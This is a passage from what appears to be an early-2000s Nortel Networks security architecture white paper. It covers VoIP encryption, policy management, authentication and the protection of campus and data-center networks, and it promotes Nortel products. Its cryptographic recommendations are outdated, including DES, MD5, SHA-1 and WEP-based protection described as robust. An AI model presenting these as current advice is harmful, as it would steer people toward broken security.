Figure 6. Secure connectivity options for network management traffic

Browser Management
Network Operating Center client client
Telnet Management
client client Remote
SSL

IPsec IPsec

Internet
L2 NOC
VLAN

IPsec or SSH SSL IPsec or SSH

Management
IPsec or SSH
Systems VS

IDS

IPsec IPsec

FW Auth AL

Enterprise network

Network devices

Firewalls and VLANs partition the network to segregate management devices and traffic from other, less confidential systems
such as public Web servers. The firewall controls the type of traffic (defined by protocol, port number, source and destination
address) that can transit the boundary between security domains. Depending on the type of firewall (application versus packet
filtering), firewalls can also filter the application content of the data flow.

Intrusion-detection systems incorporated into management servers defend against network intrusions by warning
administrators of potential security incidents, such as a server compromise or denial-of-service attack.

Hardening operating systems used for network management close potential security gaps in general-purpose operating
systems and embedded real-time operating systems. OS hardening should use the latest procedures and patches from the
OS manufacturer.

Anti-virus protection involves scanning all in-house and third-party software packages with virus-detection tools before
incorporating the software into a product or network. A rigorous, established process ensures—to the extent possible—
that network management software is virus-free.

17
2.6. Secure multimedia communications

Unified networks can carry voice, data, and video—each with their unique performance requirements and security considera-
tions. When and where to encrypt this traffic is a major consideration, and is a key element of any enterprise security policy.
This can be done on a per-application basis using SSL, on a client-server basis using SSH (Secure Shell), or for all traffic using
IPsec VPN technology. Generally, all traffic over the Internet and wireless LANs and potentially critical information leaving the
premises should be secured via strong encryption technology.

IP telephony represents a particularly important class of application. As with any applications, a risk assessment of IP telephony
needs to be done to assess its intrinsic value, the implications of loss understood, and a security policy formulated. We can start
this assessment by making some key observations on telephony and data security in general. First of all, telephony is a critical
business function and therefore, like the network itself, the telephony system as a whole must be protected from security
attacks. Secondly, we trust the public voice network and live with the inherent vulnerability of eavesdropping of public cell
phone systems. Third, we trust PBX networks, the critical components of which are locked away in a telecom room. In addi-
tion, IT organizations have spent a lot of effort to minimize toll fraud and misuse of the voice network for personal calls.

On the data side, we also rely on physical security to ensure that only employees have access to the internal network, and we
trust that information sent over LANs, campus nets, and over private WANs running over physical and virtual private lines are
generally secure. Outside of the confines of the enterprise network, most enterprises have established security policies that all
internal data transmissions to employees and remote offices over the Internet need to be encrypted and authenticated.
Likewise, critical customer interactions over the Web are protected via SSL. From a user perspective, keeping it simple has been
the objective.

The Nortel Networks Unified Security Architecture for IP telephony follows the guidelines below:
• Enterprise IP telephony operated within the confines of the enterprise, inter-working with the public network over circuit-
switched connections. End-to-end VoIP connectivity between public phones and phones within the enterprise is not
considered in this version of the document.
• The IP networking infrastructure that supports IP telephony must be secure from a data perspective and engineered to
meet the stringent latency and reliability requirements of telephony.
• IP telephony communications servers are business-critical and must be physically secure and protected from internal and
external attack.
• Secure authentication of VoIP clients must be provided. While data users may expect to log in with multiple userIDs and
passwords, they won’t tolerate that authentication requirement for every phone call. Generally, telephony users have only
been required to authenticate themselves for off-net access using a feature set called Direct Inward System Access (DISA).
• Encryption of voice is only a requirement when traversing a shared media LAN or the Internet.
• Security must be holistic and span the entire telephony environment, including VoIP clients and servers, application
servers (such as for unified messaging and contact centers), and traditional PBXs.

Encryption can be achieved with VPN techniques using IPSec, with Authentication Header (AH) and Encapsulating Security
Payload (ESP), tunneling through the use of Layer 2 Tunneling Protocol (L2TP), key management based on Internet Key
Exchange (IKE), and certificate management based on Public Key Infrastructure X.509 (PKIX), Certificate Management
Protocol (CMP), Online Certificate Status Protocol (OCSP), and Simple Certificate Validation Protocol (SCVP). SSL and
Transport Layer Security (TLS) protect communications at the application layer.

Standards-based encryption algorithms and hashes such as DES, 3DES, AES, RSA and DSA. MD5 and SHA-1 should be used
for message integrity, and Diffie-Hellman and RSA for key exchange.

The Wired Equivalent Privacy (WEP) as defined in the 802.11 standard defines a technique to protect over-the-air transmis-
sion between wireless LAN (WLAN) access points and network interface cards (NICs). This protocol has been shown to be
insecure. IEEE 802.11 is working on standardizing encryption improvements for WLANs. Therefore, added measures of
protection such as IPsec must be used to secure WLAN traffic over WEP.
18
2.7. Network survivability under attack

The typical enterprise network supports mission-critical operations and is essential for conducting business. That means the
network must continue to operate—delivering essential services in a timely manner—while battling security threats, even if
parts of the network are unreachable or disabled due to overt attack.

This kind of survivability starts by logically organizing network services into at least two categories—essential services and non-
essential services—and defining strategies that enable these services to resist, address, and recover from attacks. The most effec-
tive approaches combine multiple resistance, identification, and recovery strategies in an adaptable manner that responds to
changing network conditions. For example, the network can re-route traffic from one server to another if an intrusion or an
attack is detected on the first server. That means an effective survivability plan is holistic; it spans management systems, hosts,
applications, routers, and switches across the network.

Naturally, the first line of resistance to attacks is strong access control through authentication and encryption. Keep intruders
out at the first point of entry, if possible. Message and packet filtering and network and server segmentation provide strong
secondary defenses. Intrusion-detection systems identify attacks in progress. Faithful attention to backup techniques enables
rapid system and network recovery after a successful system breach.

This includes high availability through redundancy of critical security functions, such as through the use of application
switches, which provide redundancy between intrusion-detection servers. Additional techniques include the encryption of all
mission-critical traffic, multi-link trunking (MLT), virtual router redundancy protocol (VRRP), dual/mirroring of disk drives,
backup CPUs, backup power supplies, and hot-swappable components. These mechanisms provide a higher level of confidence
in the survivability of critical applications (such as IP telephony).

2.8. The closed-loop policy management reference model

The Nortel Networks Unified Security Architecture is based on the IETF architectural framework for policy management
(RFC 2753). In this model, policy management is implemented across the network and at all levels (application, network-
assisted, network), and applicable to all types of user and applications.

Figure 7. Policy management within the Unified Security Architecture

Policy LDAP
repository
Policy management
console
LDAP

Policy server—
Policy Decision Point
(PDP)

COP-PR, SNMP, CLI

Network devices—
Policy Enforcement
Point (PEP)

L2 NAT Auth AL FW CF

19
The IETF policy management model uses these key elements and protocols:

Policy Decision Points (PDPs) or policy servers abstract network policies into specific device control messages, which are
then passed to policy enforcement points. These policy servers are often standalone systems running Unix or Windows
NT/2000, controlling switches and routers within an administrative domain; they communicate with these devices using a
control protocol (e.g., COPS, SNMP Set commands, Telnet, or the device’s specific Command Line Interface—CLI).

A Policy Enforcement Point (PEP) is a network or security device that accepts a policy (configuration rules) from the Policy
Decision Point and enforces that policy against network traffic traversing that device. This enforcement leverages network and
network-assisted security mechanisms as appropriate.

Common Open Policy Service (COPS) is a simple query-and-response, stateful, TCP-based protocol that exchanges policy
information between a Policy Decision Point (PDP) and its clients—Policy Enforcement Points (PEPs). It is specified in
RFC 2748. COPS relies on the PEP to establish connections to a primary PDP (and a secondary PDP when the primary
is unreachable) at all times. Alternatively, a COPS proxy device can be used to translate COPS messages originating from a
policy server into SNMP or CLI commands understood by network and security devices.

The COPS protocol supports two different extension models for policy control: a dynamic outsourcing model COPS-RSVP,
specified in RFC 2749, and a configuration or Provisioning model COPS-PR, specified in RFC 3084. Provisioning extensions
to the COPS protocol allow policies to be installed on the PEP “up front” by the PDP, thus allowing the PEP to make policy
decisions for data packets based on this pre-provisioned information. Further communication between the PDP and PEP is
necessary to keep policies provisioned in the data repository (i.e. the directory) in sync with those sent to the PEP.

The Policy Repository stores all policy information in a network directory. It describes network users, applications, computers,
and services (i.e., objects and attributes), and the relationships between these entities. There is tight integration between IP
address and the end user (via Dynamic Host Control Protocol - DHCP and a Domain Name System - DNS). This policy
repository is usually implemented on a special-purpose database machine running Unix or Windows NT/2000 accessed by
policy servers via LDAP.

The Policy Repository stores relatively static information about the network (such as device configurations), whereas policy
servers store more dynamic network state information (such as bandwidth allocation or information about established connec-
tions). The policy server retrieves policy information from the directory and deploys it to the appropriate network elements.

There is no established standard to describe the structure of the directory database, i.e., how network objects and their attrib-
utes are defined and represented. A common directory schema is needed if multiple vendor applications are to share the same
directory information; for example, all vendors need a common way to interpret and store configuration information about
routers. The forthcoming Directory-Enabled Networking (DEN) standard, now being developed by the DMTF (Desktop
Management Task Force), addresses this need. DEN includes an information model that provides an abstraction of profiles and
policies, devices, protocols, and services. This provides a unified model for integrating users, applications, and networking serv-
ices, and an extensible service-oriented framework.

The Lightweight Directory Access Protocol (LDAP version 3) is specified in RFC 2251. LDAP is a client-server protocol for
accessing a directory service. The LDAP information model is based on the entry, which contains information about some
object (e.g., a person), and is composed of attributes, which have a type and one or more values. Each attribute has a syntax
that determines what kinds of values are allowed in the attribute and how those values behave during directory operations.

The last element is the policy management console—generally running on a personal computer or workstation—that provides
the human interface to the policy management system. A Web browser can be used to provide manager access from virtually
anywhere, with policy object-level security used to limit which policies can be modified by a specific individual. The console
provides a graphical user interface and the tools to define network policies as business rules. It may also give the operator
access to lower-level security configurations in individual switches and routers.

20
These elements of the IETF policy management reference model interoperate to deliver closed-loop policy management. This
includes configuration of edge devices, enforcement of policies in the network, and verification of network functionality as seen
by the end-user application. Enforcement of policies in the network includes admission controls of applications or users vying
for access to network resources. Sound policy management based on this model simplifies the configuration management envi-
ronment inside enterprises and minimizes the chance of human error.

Policy Management through Nortel Networks Optivity Policy Services


Nortel Networks is leading the way in delivering policy-enabled networking to enterprise customers. For example, Nortel
Networks Optivity Policy Services (OPS) is a system-level software application that manages security parameters and traffic
prioritization. Optivity Policy Services enables a proactive approach to bandwidth management, security, and prioritization of
business-critical traffic flows across the enterprise. Rather than applying policies to control traffic on a per-device basis, OPS
takes a centralized systems approach to policy configuration and deployment that ensures consistency across the network while
lowering total cost of ownership.

Based on the IETF policy architecture, Optivity Policy Services supports the major IETF policy management standards,
including COPS-PR, LDAP, Diffserv, and IEEE 802.1p. OPS uses COPS-PR to pre-provision routers and switches with policy
information based on Roles reported in from the PEP. Roles are a logical abstraction of the device’s interfaces for policy
management purposes. With the ability to manage up to 1,000 devices per server and 20,000 devices per system, OPS reliably
delivers QoS and security policies in large networks. Moreover, OPS uses LDAPv3 to support redundant data storage,
preserving valuable policy information.

As the number of denial-of-service attacks on networks increases, a centralized mechanism to limit potentially dangerous traffic
flows is important. OPS makes it easy to set policies for metering traffic. For example, many denial-of-service attacks occur
when too many packets of a certain protocol type (such as ICMP) flood a device. OPS policies can control that flow of traffic.
With its Advanced Security Provisioning capabilities, OPS can protect valuable network and application assets by enabling the
application of consistent, reliable, and robust security policies. OPS complements existing firewall implementations (e.g.
Alteon) and IP-VPN devices (e.g. Contivity) by adding an extra layer of protection to network resources. OPS features enable
the creation of policies to restrict traffic through a particular policy enforcement point or to deny all traffic on a particular
device. OPS enables control of traffic flows through a device by simply creating admission control policies through a central
JAVA-based management console.

2.9. A closer look at uniform access management


Secure access management is created through a combination of authentication, authorization, and accounting services,
often called “AAA”.
• Authentication, initiated by an authentication client in a PC or gateway device, positively verifies the identity of a user
as a prerequisite to allowing access.
• Authorization determines which system resources are appropriate for that authenticated user to access.
• Accounting capabilities rely on audit logs or records of security-related events for future examination.
This section takes a closer look at authentication and authorization.

Authentication
Authentication systems can be categorized according to the number of identification factors required to ascertain identity.
• Single-factor authentication uses userID/password combinations to prove identity.
• Two-factor authentication requires two components, usually a combination of something the user knows
(such as a password) and something the user possesses (such as a physical token SecureID card).
• Three-factor authentication adds a biometric, a measurement of a human body characteristic.
21
The more authentication factors used, the more secure the process. However, the more factors you add, the more you add
complexity, cost, and management overhead. Every scenario will offer a different break-even point in the trade-off between
simplicity and security.

Single-factor authentication with userID and password is the most common authentication system today. It’s easy to admin-
ister, familiar to users, and can provide a high level of security if strong password procedures are enforced. Legacy password
systems have had some challenges, however, since multiple strong passwords are very hard for users to remember. The recom-
mendations in this section will show how this problem can be minimized with a “Single Strong Password” system.

Tokens such as smartcards and SecureID cards are added as a second factor in many authentication systems—requiring that the
user have physical possession of the token. An attacker would similarly have to have possession of the user’s token in order to
gain system access. The higher level of authentication comes with additional system cost, however, due to the necessary tokens
and token readers. In addition, tokens can be easily lost, which can present a high administration overhead for reissuing.

Biometric factors for authentication measure characteristics of the user’s body such as fingerprint, handprint, retina, iris, or
voice characteristics. Biometric measurements are a useful additional factor and add an even higher level of authentication secu-
rity. A biometric authentication system entails a measurement proving whom the person actually is, rather than proving they
have something such as a token or proving that they know something such as a password. Unfortunately, biometric measure-
ments are not 100 percent effective; with the present state of the technology, it is possible to register false positives and false
negatives. Biometric authentication systems also require biometric readers at system access points, adding new system costs.

Strong cryptographically-based authentication can be provided through the use of digital certificates issued to users and stored
on tokens or within the user’s computer memory. Cryptographic algorithms are used to ensure that a particular certificate has
been legitimately issued to the user. A Public Key Infrastructure is used to enable the issuance and maintenance of digital
certificates. Strong cryptographically-based systems provide very stringent authentication. However, these systems are expensive
and incur additional management overhead. Therefore, they are currently being adopted only in very secure environments.

Authorization
Once authenticated, authorization mechanisms control user access to appropriate system resources. Authorization can be cate-
gorized according to the granularity of control; that is, according to how detailed a division is made between system resources.
Fine-grained authorization refers generically to a system where access is controlled to very fine increments, such as to individual
applications or services.

Authorization is often “role based” whereby access to system resources is based on a person’s assigned role in an organization.
The System Administrator role may have highly privileged access to all system resources whereas the General User role would
only have access to a subset of these resources. Finer grained authorization can be applied to define other roles, such as a
Human Resources Administrators role that has exclusive access to confidential HR databases, and an Accounting role that has
exclusive access to accounting systems.

Authorization may also be “rules based” whereby access to system resources is based on specific rules associated with each user,
independent of their role in the organization. For example, rules may be set up to allow Read Only access or Read/Write access
all or certain files within a system, or access only during certain times or from certain devices.

Authentication and authorization protocols


Several protocols have been commonly adopted for authentication services. The RADIUS protocol (Remote Authentication
Dial In User Service – IETF RFC2865) is widely used to centralize password authentication services. Originally designed to
authenticate remote dial-in users, the RADIUS protocol has been adopted for general user authentication services. Recently,
the LDAP (lightweight directory access protocol – IETF RFC2251) has been finding extensive use in authentication and
authorization systems. LDAP provides a convenient method for storing user authentication and authorization credentials.

22
RADIUS authentication servers are often coupled with credential storage in LDAP directories to provide centralized authenti-
cation and authorization. When a user attempts to access a particular application on such a system, the application queries the
user for authentication credentials and forwards them to the centralized system. The RADIUS server then checks the presented
credentials against those stored in the LDAP database, and also queries the LDAP database for authorization rule information.
The authentication results (pass or fail) are returned to the application along with authorization rule information for the partic-
ular user. Authorization rules are then enforced at the application to allow the user to access particular data or services. From
an end-user perspective, these authentication and authorization systems should be automatic and easy to use.

Authentication and authorization recommendations


Nortel Networks recommends the following general principles to be followed when implementing enterprise authentication
and authorization systems:

• Use a uniform access management system for end users, network operators, partners and customers, with the appropriate
level of authentication and resource access authorization to meet business needs.
• Use a centralized authentication mechanism to facilitate administration and remove the need for locally stored passwords,
which tend to be static and weak.
• Use a centralized authorization system, tightly coupled with authentication system, with appropriate granularity for the
enterprise.
• Enforce strong, complex rules for all passwords.
• Securely store all passwords in one-way encrypted (hashed) format.
• Maintain simplicity to the extent appropriate, for maximum ease of use, ease of administration, and compliance.
• Securely log authentication and authorization events for audit purposes.

Figure 8. Secure authentication and authorization reference model

DHCP server DNS server

Local wired
PC access Centralized
Authenticaton
Server
Remote IP-VPN office (RADIUS based)
Remote IP-VPN user Auth

WLAN IP-VPN user Enterprise network

Secure IP
Services Gateway Level 1 Password
Authentication
Internet Database
Remote Access

FW IPsec SRT Auth Level 2 Token


Authentication
Level 3 Biometric Database
Auth Authentication
Database

Application server
with Centralized
Authentication

23
A Case example: “Single Strong Password” in the Nortel Networks corporate network
Nortel Networks uses a “Single Strong Password” approach in its own worldwide network to authenticate internal and external
users, from employees and contractors to joint venture representatives and even customers. The user has one very strong pass-
word that is maintained on a centralized password system and synchronized with applications and systems across the enterprise.
Users only have to remember one password, making the system simple to use and not likely to be bypassed.

Dedicated password servers on several continents manage the system and provide Web-based password management for users
and security administrators. These password servers communicate directly with RADIUS authentication servers. The system
automatically synchronizes passwords across multiple systems and platforms, such as Windows networking, remote access,
UNIX, purchasing, and niche business applications.

The system enables fine-grained authorization at the application level. An internally developed tool enables applications to
access the Single Strong Password system, and a list of users allowed to access each application is stored in the authorization
database. When an application is accessed, the Single Strong Password system authenticates the user and returns authorization
information. The system logs attempted violations of authorization rules and multiple simultaneous logins to geographically
dispersed systems, to detect and prevent misuse.

The Single Strong Password system enforces strict password rules. For example, passwords must contain at least eight charac-
ters, both upper and lowercase letters, and at least one number or symbol. Additionally, passwords must not contain dictionary
words of four characters or longer, a previously used password, a password that matches an account name, contain a date or
year, keyboard patterns, or repeating characters. Users are required to change passwords at predefined intervals.

After years of real-world use, Nortel Networks has seen the following advantages of this system:

• Single consistent method for setting passwords


• Single consistent method for authentication and authorization
• Single method for registering and terminating user accounts
• Enforcement of corporate password strength guidelines
• Consistency across applications, so employees know what to do
• Standardization that makes the system easy to support and adopt
• Fast, seamless performance through standard interface and APIs
• Lower costs, fewer help desk calls

Figure 9. Single password access management in Nortel Networks corporate network

RADIUS server

Password
Authentication
Local, remote, Single Database
wired, wireless password
access
• Employees management
• Technicians
• Contractors Enterprise network
• Partners
• Customers

RADIUS-enabled enterprise applications:


CRM, SCM, ERP, unified messaging,
self-serve benefits, expense system ...
24
Part III. Network security in the real world
The previous section outlined key principles and practices of the Nortel Networks Unified Security Architecture.
This section demonstrates this multi-level security framework in action for several real-world scenarios:

• Securing the campus network


• Securing the data center
• Securing the remote office
• Securing remote access
• Securing IP telephony services

3.1. Securing the campus network


In this context, the term “campus” describes a corporate headquarters or large regional office where the network uses a mix
of technologies, products, and applications, and serves a large user population. The campus network presents a challenging
security picture because of the diversity of elements to protect:

• Servers, including departmental servers for user access and file sharing, central application servers such as finance and
databases, and Web servers for either public Web or Intranet applications.
• Operating systems, typically multiple versions of multiple operating systems running on servers and clients.
• Network devices, including routers, Layer 4-7 load-balancing switches, Layer 3 core switches, Layer 2 distribution
switches, and wireless LAN access points.
• Security devices, such as firewalls, VPN gateways, intrusion-detection and anti-virus servers, SSL accelerators,
authentication servers, and content filtering servers.

Securing the campus network at the “network security level”


Layer 2 switching security. VLANs based on IEEE 802.1Q standard and Ethernet switches segregate traffic for greater secu-
rity and manageability. When port-based VLANs are configured, each VLAN is completely separated from others—particularly
those in the broadcast domain. In order to limit network access, numbers of Ethernet switches provide port security that ties a
MAC address list to specific switches or even ports of those switches and prevents “unknown” workstations to get access. This
list may be built either by auto-discovery or by manual update.

With the general availability of the 802.1x authentication standard, Ethernet switches offer embedded capabilities to apply
security at every node in the network, providing an effective framework for authenticating and controlling user traffic to a
protected network. 802.1x ties a protocol called EAP (Extensible Authentication Protocol, originally developed for PPP) to
LAN media and supports multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates,
and public key authentication. It enables enforcement of client authorization on corporate authentication servers like RADIUS.

EAP not only controls Layer 2 port connectivity, but can be extended (as being done by Nortel Networks) along with secure
access management to customize the security (and QoS) end-user profiles of the port for a particular authenticated user. When
a host attempts to log onto the network, the host and an authentication service exchange data via EAP. Under an end-user
profile architecture, the EAP protocol enables the policy server to leverage information in a third-party authentication service
to validate users and assign appropriate network access and QoS (Quality of Service) capabilities.

Layer 2 wireless LAN security. Wireless LANs offer a flexible alternative to regular Ethernet connectivity, but they suffer from
known vulnerabilities. For one, it’s hard to control who is really accessing the system. Second, the current Wired Equivalent
Privacy (WEP) 802.11 encryption method is weak.

25
Figure 10. Securing the campus network

Engineering

Virus VS
Load-balanced
screening IDS servers
L2 server

IDS

CF
Backbone
Layer 2-7 Enterprise
Human resources Routing Switch
with Web NAT FW
Switching
AL
Distribution L2 High
L2 Layer 2-7 Switched
capacity
Routing Firewall
Switch router

Internet
SSL IP-VPN
Services
Finance
Gateway
Auth SRT
IP PBX
IPsec FW
L2

SSL WLAN PC

PSTN

Campus servers

For both reasons, it is recommended to use VPN technology for wireless LANs and run an IP-VPN client, such as Nortel
Networks Contivity Client, on the wireless device. VPN-based wireless security is platform and radio technology agnostic—
that is, the client system establishes a connection to the network via 802.11b, 802.11a, or even Bluetooth, and the VPN takes
over from there. Most of the authentication takes place independently of the wireless network, keeping access point mainte-
nance simple. The VPN can treat the wireless LAN just as the corporate backbone with wireless access points. Users trying to
access the network via the wireless LAN would then be authenticated, their information encrypted, and all communication
logged by the VPN system.

Alternatively, with some WLAN IP phones, encryption and authentication is built in. For example, Nortel Networks has a
strategic partnership with Symbol, whose WLAN IP phones support 128-bit WEP encryption between the client and the
wireless access point, and Kerberos authentication. Combining those approaches provides robust user authentication and
encryption required for WLAN environments.

Layer 3 switching and routing security. Network address translation (NAT) enables an organization to present a public IP
address to the world and hide internal addresses from public view. Processing NAT in hardware with a switch is an innovative
strategy for converting internal addresses into public addresses (and vice versa), making routing and firewall solutions highly
efficient.

26
Proper design and use of routing and Layer 3 switching enhance the survivability of the campus network. Access control lists,
IP segmentation and sub-netting, redundancy protocols such as Virtual Router Redundancy Protocol (VRRP), and fast conver-
gence routing using OSPF (Open Shortest Path First) all contribute to a more survivable infrastructure.

Routers and routing switches secure the data path using IP filters that drop undesirable packets. Routing can be further
secure by implementing route policies, encryption and authentication of OSPF and BGP route updates with MD5, and
broadcast/multicast rate limiting.

Last but not least is the innovative Secure Routing Technology (SRT), which enables dynamic routing over secure IPsec tunnels
for RIP and OSPF. Contivity Secure IP Services Gateways implement this dynamic secure routing approach, which is
described later in this document in the “Securing Remote Access” scenario.

Securing remote communication via IPsec VPNs and SSL extranets. Typically, the campus network also supports VPNs to
connect with branch offices and remote users—carrying private network traffic within a secure, encrypted “tunnel” carried over
a public network. Robust and secure central site solutions that support both remote access and remote office IP-VPNs and fire-
walls are key elements of the campus network. For more information, see “Securing the Remote Office” and “Securing Remote
Access,” later in this section.

Securing the campus network at the “network-assisted security level”


Perimeter control via firewalls and intrusion-detection servers. The enterprise network often provides employees with
connection to the Internet from the corporate headquarters campus. It is usually centralized in order to more easily protect a
single interface to the public world. That’s exactly where perimeter control solution such as firewalls and intrusion-detection
systems (IDSs) are generally deployed to prevent malicious intrusion of unauthorized persons.

It is highly recommended that firewalls be implemented at every site within an enterprise to secure internal and external traffic,
and at every point of interconnection with the Internet (e.g. even a remote PC). In some cases, it is appropriate to integrate
this functionality with secure IP services gateways used also for remote office and remote access IP-VPNs.

Firewalls provide a perimeter defense against unauthorized access—an essential first step when planning for Internet access.
Firewalls come in various sizes and capabilities, fitting many specific network requirements depending on their point of use.
An emerging trend is to use new, multi-gigabit firewalls to interconnect segments of the campus LAN, which keeps depart-
ments separate and enables communication only through firewall security policies.

An IDS monitors the network to identify unauthorized users or suspicious patterns of utilization. Most IDS applications
compare network traffic and host log entries to match data signatures and host address profiles indicative of hackers.
Intrusion-detection software identifies traffic patterns that indicate the presence of unauthorized users. Suspicious activities
trigger administrator alarms and other configurable responses. Nortel Networks partners with best-of-breed companies such
as Internet Security Systems (ISS) to offer specialty software solutions for intrusion-detection.

Content inspection via content filtering and anti-virus systems. These tools provide essential protections for remote and
local computing, and are discussed in more detail in Part III under “Securing the Data Center.”

Layer 4 to 7 switching and filtering security. Layer 4 to 7 switches provide control services to application, management,
and traffic to improve resource utilization and performance, ensure security with high performance, provide network scalability,
and provide failsafe network assurance. They are usually deployed near security devices and in server farms. Integrated security
filtering offloads firewall processing of NAT, monitors network activity, protects against denial-of-service attacks and some virus
types such as Code Red / Blue, and protects data without compromising throughput. Nortel Networks Passport 8600 and
Nortel Neworks Alteon Web switches offer extensive Layer 4 to 7 capabilities.

27
These solutions are more generally implemented in the data center, but have value in front of campus servers:
• Load-balancing. Firewalls and VPNs are compute-intensive applications and can become bottlenecks to network perform-
ance. Load-balancing using an application switch mitigates this problem by distributing traffic among multiple active
devices, enabling many firewalls/VPNs to operate in parallel.
• Port mirroring. Similarly, IDS functions are extremely compute-intensive and can slow network performance. Port
mirroring on an application switch duplicates the data and sends it to one or more intrusion-detection servers (which
can be load-balanced) for packet inspection at the same time the original data flow is being forwarded without delay.
In small campus networks, these capabilities can be provided by Alteon Web switches. In large campus networks, a
Nortel Networks Passport 8600 system with integrated Alteon Web Switching Module provides the required scalability.

3.2. Securing the data center


The typical enterprise data center supports mission-critical applications and houses a high concentration of capital-intensive
resources and confidential data—all connected to the inherently insecure Internet as well as internal users. That means securing
the data center presents some unique requirements for failsafe security without compromising performance and availability for
users. The need increases as enterprises discover new ways to exploit high-performance, Internet-empowered data centers:

• Ensure business continuity. Massive processing throughput and transport bandwidth now make it feasible to store
primary and duplicate sets of critical data in multiple data centers, in real time—to extend business continuity services,
real-time storage mirroring, and live backup across service provider networks.
• Support critical business applications. Enterprises use data centers to host business applications, implement firewalls or
virtual private networks, provide storage services and content delivery of static and streaming media, and more.
• Produce economies of scale on infrastructure. Enterprises can consolidate or outsource data center functions, to
centralize critical computing resources, create virtual data centers that span multiple locations, and reduce operational costs
without the performance penalty or security concerns typically associated with remote access.
The “closed” enterprise may outsource its Web presence to a third party, but “extended” and “open” enterprises are exposed to
the Internet for customer access, business-to-business connectivity, and interworking with application service providers, disaster
recovery providers, and more. There’s a big survival risk for companies that don’t Web-connect with extended communities—
yet there’s a big security risk for those that do.

A comprehensive data center security strategy requires multiple, inter-working technologies, protocols, and procedures—
with partitioning among these functions provided by VLANs and firewalls.

Securing the data center at the “network security level”


Virtual Private Networks. It is highly recommended that firewalls be implemented at every site within an enterprise to secure
internal and external traffic, and at every point of interconnection with the Internet (e.g. even a remote PC). In some cases,
it is appropriate to integrate this functionality with Secure IP Services Gateways used also for remote office and remote access
IP-VPNs enable enterprises to enjoy secure connectivity with branch offices, business partners, and remote users. For employee
access, the central site VPN solution can be implemented at the campus edge; for partner and business-to-business connec-
tivity, the VPN can be implemented in the data center, or the two can be integrated. The ideal VPN gateway should provide
an all-in-one solution for routing, bandwidth management, authentication, encryption, network address translation, data
integrity, logging, and firewall capabilities. Nortel Networks market-leading Contivity Secure IP Services Gateways (built on
Secure Routing Technology—SRT) meets these requirements.

Network address translation (NAT) enables the enterprise data center to present a public IP address to the world and hide
internal server addresses from public view. Converting external to internal addresses (and vice versa) can be performed in
switch hardware, thereby enhancing the efficiency of routing, switching, and firewall functions.

28
Figure 11. Securing the data center

Mission-critical
enterprise applications DMZ
SSL Web
VS servers
Virus
screening
server
L2

CF
Backbone
Layer 2-7 Routing Enterprise
Switch with
Web Switching NAT FW

SSL AL
L2
High
Switched capacity
Firewall router
Other enterprise applications
L2

Internet

SSL IP-VPN
Services
Gateway
Management domain Auth SRT

IPsec FW
LDAP

L2 IDS

RADIUS

Load-balanced
IDS servers
DNS

Securing the data center at the “network-assisted security level”


Switched firewalls can now provide multi-gigabit throughput and state-of-the-art filtering to secure and safeguard data center
servers without the performance degradation that typically occurs with deep packet inspection. Switched firewalling introduced
the same level of performance improvements to perimeter security as Layer 3 switching brought to LAN routing. Therefore,
a switch-based firewall is recommended for perimeter security in transaction-oriented environments. The Nortel Networks
Alteon Switched Firewall combines Layer 4-7 cut-through switching with firewall software processing to deliver more than
4 Gbps throughput. Logical “demilitarized zones” can be created through the use of VLANs.

Secure Sockets Layer (SSL) protocol—built into most browsers and Web servers—is widely used to protect communications
to and from Web applications. Unfortunately, SSL processing is very compute-intensive and significantly reduces server
performance. This results in increased cost and operational complexity when it comes time to scale secure transaction
processing. SSL Accelerators—such as Nortel Networks Alteon solution—offload SSL processing from local servers without
imposing delays on other traffic in the same data path, and offer a simpler way to deploy and maintain the Public Key
Infrastructure (PKI) required for electronic transactions.

29
intrusion-detection, anti-virus, and content filtering tools provide essential protections for online commerce and remote
computing in general. IDS software identifies traffic patterns that indicate the presence of unauthorized users. Anti-virus
software detects and defuses potential cyber attacks. Content filtering software restricts the type of data that can be accessed
or distributed.

IDSs can be broadly categorized according to the following criteria:

• Incident detection timeframe—real-time or off-line, depending on whether system logs and network traffic are analyzed
as events take place or in batch mode during off hours.
• Type of installation—network-based or host-based. A network-based IDS typically involves multiple monitors
(often pre-configured appliances) installed at choke points on the network (where all traffic between two points can be
monitored). A host-based IDS requires that software be installed directly on the servers to be protected, and monitors
the network connections and user activity on those servers.
• Type of reaction to incidents—whether the IDS actively intervenes to head off attacks (such as by modifying firewall
rules or router filters) or simply notifies staff or other network systems of the problem.
Most commercial IDS products provide a combination of network- and host-based monitoring capabilities, with a central
management host to receive reports from the various monitors and alert network support staff. A network-based IDS is
recommended for most installations.

Anti-virus solutions continuously monitor applications to ensure that no virus damages the system. It detects malicious
viruses, worms, and Trojan horses in all major file types, including mobile code and compressed file formats.

Content filtering software restricts the type of data that can be accessed or distributed to expose employees and partners only
to correct and appropriate content. Content filtering can identify inappropriate Web ‘surfing’ and stem productivity losses due
to prolonged Internet use. Content filtering also helps minimize the spread of viruses from Web servers. The Alteon Content
Cache (ACC) supports hundreds of URL filters providing customers with the ability to protect themselves from well-known
URL server attacks. ACC also stops many viruses like NIMDA and Code Red, and can be used to control which sites are
accessible.

Together, these measures enable networks to be open and accessible for legitimate uses, but not wide open for inappropriate
or malicious uses.

Layer 4 to 7 application switching provides high-availability traffic management by filtering and switching traffic based on
application and content information, without compromising throughput. To increase protection against denial-of-service
(DoS) attacks and Syn Attack Alarms, routing switches such as Nortel Networks Passport 8600 enable network administrators
to set a threshold for new half-open sessions and have the Layer 4-7 Switch trigger a trap to notify the administrator when the
threshold is exceeded.

A “protection from application abuse” feature limits the rate of new TCP connections on a per-client basis. Administrators can
limit users to a particular connection rate and limit the number of sessions for users accessing a specific domain or application
within the domain. Benefits include protection from application abuse, increased application availability, and increased control
of user access to applications. Layer 7 Deny Filters allow network administrators to create filters and assign URLs to those
filters to deny certain traffic. This is particularly useful for added anti-virus protection for preventing access to disallowed
Web content.

Alteon Web switches and Passport 8600 systems equipped with an Alteon Web Switching Module both offer high-performance
Layer 2-7 filtering. These systems also perform load balancing to eliminate data center performance bottlenecks, including
VPN, firewall, IDS, DNS, and IDS systems.

30
Securing data center storage
When enterprises were organized into business silos—each running their own applications and databases—direct
attached storage (DAS) was sufficient. Storage devices were dedicated and physically attached to each server; securing
them was relatively simple.

With the emergence of storage area networks (SANs) to support global applications more cost-effectively, the security
picture becomes more complex. SANs connect a number of storage devices and application servers across a dedicated
network running protocols such as Fibre Channel, ESCON, and FICON at speeds up to 2 Gbps. Optical systems—
such as Nortel Networks OPTera Coarse/Dense Wave Division Multiplexing (CWDM/DWDM) system—have
enabled massively scalable SANs that span the MAN and WAN.

